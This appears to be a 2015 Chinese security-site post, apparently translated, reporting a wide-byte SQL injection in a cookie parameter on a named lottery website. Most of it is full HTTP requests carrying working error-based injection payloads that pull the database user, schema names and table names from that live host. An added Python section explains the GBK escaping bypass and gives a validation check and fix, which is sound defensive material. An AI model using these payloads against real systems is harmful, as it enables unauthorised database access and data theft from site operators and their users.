Welcome to 黑吧安全网: the latest network security news, curated content, and technical discussion.

Wide-byte SQL injection via a Cookie on a 乐彩网 site

Source: compiled by this site  Author: anonymous  Date: 2015-05-08

wap.17500.cn
Wide-byte injection:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,user(),0x5e5e5e) from information_schema.tables limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive
The KmGZ_89fa_sid parameter in the cookie

user: bbs@192.168.100.107
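
Why the %bf%27 prefix in the request above gets past quote escaping, as an added example that is not part of the original article. It assumes the application escapes cookie bytes the way PHP addslashes() does and that the MySQL connection charset is GBK; the function names are hypothetical and the sample values are constructed from the request above.

```python
# Added example: charset-unaware escaping vs. a GBK connection, plus a validation check.
from urllib.parse import unquote_to_bytes

ESCAPED = (0x27, 0x22, 0x5C, 0x00)   # ' " \ NUL

def addslashes(raw: bytes) -> bytes:
    """Byte-wise escaping with no knowledge of the charset (as PHP addslashes does)."""
    out = bytearray()
    for b in raw:
        if b in ESCAPED:
            out.append(0x5C)          # prefix a backslash
        out.append(b)
    return bytes(out)

def free_quotes(sql_bytes: bytes, charset: str) -> int:
    """Count single quotes left unescaped once the bytes are read as `charset`."""
    text = sql_bytes.decode(charset, errors="replace")
    count = i = 0
    while i < len(text):
        if text[i] == "\\":           # a backslash neutralises the next character
            i += 2
            continue
        count += text[i] == "'"
        i += 1
    return count

def malformed_gbk(cookie_value: str) -> bool:
    """True when the percent-decoded value is not valid GBK (e.g. lead byte + quote)."""
    try:
        unquote_to_bytes(cookie_value).decode("gbk")
        return False
    except UnicodeDecodeError:
        return True

if __name__ == "__main__":
    escaped = addslashes(unquote_to_bytes("%bf%27"))
    # 0xBF 0x5C 0x27: under GBK the first two bytes form one character,
    # so the backslash no longer guards the quote.
    print(escaped.hex())
    print("latin-1 free quotes:", free_quotes(escaped, "latin-1"))
    print("gbk free quotes:", free_quotes(escaped, "gbk"))
    # Reject the value before it reaches the query layer.
    print(malformed_gbk("%bf%27"), malformed_gbk("J4L14hLk"))
```

On the PHP side the fix is to bind the value in a prepared statement, or to set the connection charset with mysqli_set_charset() so that mysqli_real_escape_string() escapes with knowledge of GBK.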
Next, the databases:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,schema_name,0x5e5e5e) from information_schema.SCHEMATA limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

Three databases:

information_schema
bbs
test
Getting the tables in the bbs database:

GET /connect.php HTTP/1.1
Host: wap.17500.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=0v0decj1ln7rpdbi076csgqkg2; pgv_pvi=7211233280; pgv_si=s8662739968; KmGZ_89fa_saltkey=J4L14hLk; KmGZ_89fa_lastvisit=1429892762; KmGZ_89fa_sid=%bf%27||(select 1 from(select count(*),concat((select concat(0x5e5e5e,table_name,0x5e5e5e) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#; KmGZ_89fa_lastact=1429896382%09connect.php%09check; KmGZ_89fa_sendmail=1
Connection: keep-alive

378 tables, so Burp had to be used to run through them.

